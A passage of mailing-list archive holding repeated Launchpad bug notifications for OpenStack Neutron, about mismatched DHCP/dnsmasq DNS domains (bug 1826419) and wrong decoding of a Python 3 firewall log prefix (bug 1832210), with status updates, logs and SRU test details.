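# they do not, which is exactly the asymmetric host/PTR output above:
assert hosts_file_fqdn != search_path_fqdn
print(hosts_file_fqdn)   # bionic-045546-2.jamespage.internal
print(search_path_fqdn)  # bionic-045546-2.designate.local
```

The reported fix is to derive both values from the same source, so forward and reverse lookups resolve within the same domain.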
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
This bug was fixed in the package neutron - 2:14.0.0-0ubuntu2~cloud0 --- neutron (2:14.0.0-0ubuntu2~cloud0) bionic-train; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:14.0.0-0ubuntu2) eoan; urgency=medium . * d/p/bug1826419.patch: Cherry pick fix to revert incorrect changes to internal DNS behaviour (LP: #1826419). ** Changed in: cloud-archive/train Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Committed Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. 
root@bionic-045546-2:~# host bionic-045546-2
bionic-045546-2.designate.local has address 192.168.21.222

In the above example:

CONF.dns_domain = jamespage.internal.
network.dns_domain = designate.local.

Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intended for use for external DNS integration such as that provided by Designate. The change made under commit https://opendev.org/openstack/neutron/commit/137a6d61053 appears to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network.

To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
This bug was fixed in the package neutron - 2:14.0.0-0ubuntu2~cloud0 --- neutron (2:14.0.0-0ubuntu2~cloud0) bionic-train; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:14.0.0-0ubuntu2) eoan; urgency=medium . * d/p/bug1826419.patch: Cherry pick fix to revert incorrect changes to internal DNS behaviour (LP: #1826419). ** Changed in: cloud-archive Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Committed Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. 
root@bionic-045546-2:~# host bionic-045546-2
bionic-045546-2.designate.local has address 192.168.21.222

In the above example:

CONF.dns_domain = jamespage.internal.
network.dns_domain = designate.local.

Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intended for use for external DNS integration such as that provided by Designate. The change made under commit https://opendev.org/openstack/neutron/commit/137a6d61053 appears to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network.

To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions
[Yahoo-eng-team] [Bug 1832210] Re: incorrect decode of log prefix under python 3
** Also affects: neutron-fwaas (Ubuntu Eoan) Importance: Undecided Status: New
** Also affects: neutron-fwaas (Ubuntu Disco) Importance: Undecided Status: New
** Also affects: neutron-fwaas (Ubuntu Cosmic) Importance: Undecided Status: New
** Description changed:
  Under Python 3, the prefix of a firewall log message is not correctly
- decode:
+ decoded "b'10612530182266949194'":

2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)
2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"}
2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]}

This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron, resulting in the 'unknown cookie packet_in' warning message.
-- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1832210

Title: incorrect decode of log prefix under python 3
Status in neutron: In Progress
Status in neutron-fwaas package in Ubuntu: New
Status in neutron-fwaas source package in Cosmic: New
Status in neutron-fwaas source package in Disco: New
Status in neutron-fwaas source package in Eoan: New

Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'":

2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)
2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"}
2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]}

This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron, resulting in the 'unknown cookie packet_in' warning message.
To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1832210/+subscriptions
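[Editor's sketch] The failure mode can be shown in miniature. The cookie value and resource id are taken from the logs above; the mapping structure is hypothetical, not the actual fwaas driver code:

```python
# Minimal sketch of the lookup failure (illustrative mapping only, not the
# fwaas driver's actual data structures): the log driver maps a numeric
# cookie prefix to port/log resources, but under py3 str() of the bytes
# prefix yields the repr "b'...'", which never matches the stored key.
known_cookies = {"10612530182266949194": "log-0bf81ded-bf94-437d-ad49-063bba9be9bb"}

prefix = b"10612530182266949194"   # prefix as received from the packet_in event

assert str(prefix) not in known_cookies          # "b'...'" -> unknown cookie
assert prefix.decode("utf-8") in known_cookies   # explicit decode matches
```

This is why the warning says "Unknown cookie packet_in": the key exists, but the lookup uses the repr form rather than the decoded string.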
[Yahoo-eng-team] [Bug 1832210] Re: incorrect decode of log prefix under python 3
Illustrated:

>>> str(b'10612530182266949194')
"b'10612530182266949194'"
>>> b'10612530182266949194'.decode('UTF-8')
'10612530182266949194'

** Also affects: neutron Importance: Undecided Status: New
-- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1832210

Title: incorrect decode of log prefix under python 3
Status in neutron: New
Status in neutron-fwaas package in Ubuntu: New

Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded:

2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)
2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"}
2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]}

This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron, resulting in the 'unknown cookie packet_in' warning message.
To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1832210/+subscriptions
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
Ubuntu SRU information

[Impact]
Use of Neutron internal DNS resolution for resolution of instances attached to the same project network is inconsistent, due to use of configuration options for the actual hostname entries in the dnsmasq hosts file paired with the network 'dns_domain' attribute, which is used to set the search path for the same dnsmasq instance.

[Test Case]
Deploy OpenStack with Neutron internal DNS support enabled.
Configure neutron with a dns_domain of 'testcase.internal'.
Set a dns_domain attribute on the project network ('designate.local').
Boot an instance attached to the network.
DNS resolution within the host will be asymmetric in terms of the actual dns domain used:

root@bionic-045546-2:~# host 192.168.21.222
222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.testcase.internal.
root@bionic-045546-2:~# host bionic-045546-2
bionic-045546-2.designate.local has address 192.168.21.222

which should be

root@bionic-045546-2:~# host bionic-045546-2
bionic-045546-2.testcase.internal has address 192.168.21.222

[Regression Potential]
Minimal; the proposed fix reverts changes in Neutron which incorrectly altered the behaviour of the internal DNS support.

[Other Info]
This change in behaviour has been discussed at the upstream Neutron IRC meeting, with consensus that the behaviour changes are incorrect and should be reverted.

** Also affects: cloud-archive Importance: Undecided Status: New
** Also affects: cloud-archive/queens Importance: Undecided Status: New
** Also affects: cloud-archive/train Importance: Undecided Status: New
** Also affects: cloud-archive/rocky Importance: Undecided Status: New
** Also affects: cloud-archive/stein Importance: Undecided Status: New
-- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1826419

Title: dhcp agent configured with mismatching domain and host entries
Status in Ubuntu Cloud Archive: New
Status in Ubuntu Cloud Archive queens series: New
Status in Ubuntu Cloud Archive rocky series: New
Status in Ubuntu Cloud Archive stein series: New
Status in Ubuntu Cloud Archive train series: New
Status in neutron: In Progress
Status in neutron package in Ubuntu: Fix Released
Status in neutron source package in Bionic: Triaged
Status in neutron source package in Cosmic: Triaged
Status in neutron source package in Disco: Triaged
Status in neutron source package in Eoan: Fix Released

Bug description: Related bug 1774710 and bug 1580588

The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match.

This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with:

root@bionic-045546-2:~# host 192.168.21.222
222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal.
root@bionic-045546-2:~# host bionic-045546-2
bionic-045546-2.designate.local has address 192.168.21.222

In the above example:

CONF.dns_domain = jamespage.internal.
network.dns_domain = designate.local.

Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intended for use for external DNS integration such as that provided by Designate. The change made under commit https://opendev.org/openstack/neutron/commit/137a6d61053 appears to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network.
To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
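The mismatch described in the bug report can be illustrated with a minimal sketch. This is a hypothetical simplification, not Neutron's actual code: the function names and the hosts-file format are assumed here for illustration. The point it shows is that the dnsmasq `--domain` flag is derived from network.dns_domain while each hosts-file FQDN is derived from CONF.dns_domain, so the two can disagree.

```python
# Hypothetical simplification of the behaviour described in the bug report --
# NOT Neutron's actual code. It shows why the dnsmasq --domain flag
# (built from network.dns_domain) and the hosts-file FQDNs
# (built from CONF.dns_domain) can disagree.

CONF_DNS_DOMAIN = "jamespage.internal."   # [DEFAULT] dns_domain in neutron.conf
NETWORK_DNS_DOMAIN = "designate.local."   # dns_domain attribute on the network


def dnsmasq_domain_flag(network_dns_domain: str) -> str:
    """--domain argument handed to dnsmasq (post-change behaviour)."""
    return "--domain=%s" % network_dns_domain.rstrip(".")


def hosts_file_entry(hostname: str, ip: str, conf_dns_domain: str) -> str:
    """Per-port line in the dnsmasq hosts file: mac,fqdn,ip (simplified)."""
    fqdn = "%s.%s" % (hostname, conf_dns_domain.rstrip("."))
    return "fa:16:3e:00:00:01,%s,%s" % (fqdn, ip)


flag = dnsmasq_domain_flag(NETWORK_DNS_DOMAIN)
entry = hosts_file_entry("bionic-045546-2", "192.168.21.222", CONF_DNS_DOMAIN)

print(flag)    # the search domain pushed to instances
print(entry)   # the name dnsmasq actually answers for

# The FQDN dnsmasq answers for does not live under the search domain:
assert not entry.split(",")[1].endswith(NETWORK_DNS_DOMAIN.rstrip("."))
```

With the fix discussed in the thread (reverting to CONF.dns_domain for the `--domain` flag), both values would be derived from the same option and the assertion above would no longer hold.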
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
** Also affects: neutron (Ubuntu Disco)
   Importance: Undecided
   Status: New
** Also affects: neutron (Ubuntu Eoan)
   Importance: Undecided
   Status: New
** Also affects: neutron (Ubuntu Bionic)
   Importance: Undecided
   Status: New
** Also affects: neutron (Ubuntu Cosmic)
   Importance: Undecided
   Status: New
** Changed in: neutron (Ubuntu Bionic)
   Status: New => Triaged

https://bugs.launchpad.net/bugs/1826419

Title: dhcp agent configured with mismatching domain and host entries

Status in neutron: In Progress
Status in neutron package in Ubuntu: New
Status in neutron source package in Bionic: Triaged
Status in neutron source package in Cosmic: New
Status in neutron source package in Disco: New
Status in neutron source package in Eoan: New
To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1826419/+subscriptions
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
** Also affects: neutron (Ubuntu)
   Importance: Undecided
   Status: New

https://bugs.launchpad.net/bugs/1826419

Title: dhcp agent configured with mismatching domain and host entries

Status in neutron: New
Status in neutron package in Ubuntu: New
To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1826419/+subscriptions
[Yahoo-eng-team] [Bug 1826419] [NEW] dhcp agent configured with mismatching domain and host entries
Public bug reported:

** Affects: neutron
   Importance: Undecided
   Status: New
https://bugs.launchpad.net/bugs/1826419

Title: dhcp agent configured with mismatching domain and host entries

Status in neutron: New

To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1826419/+subscriptions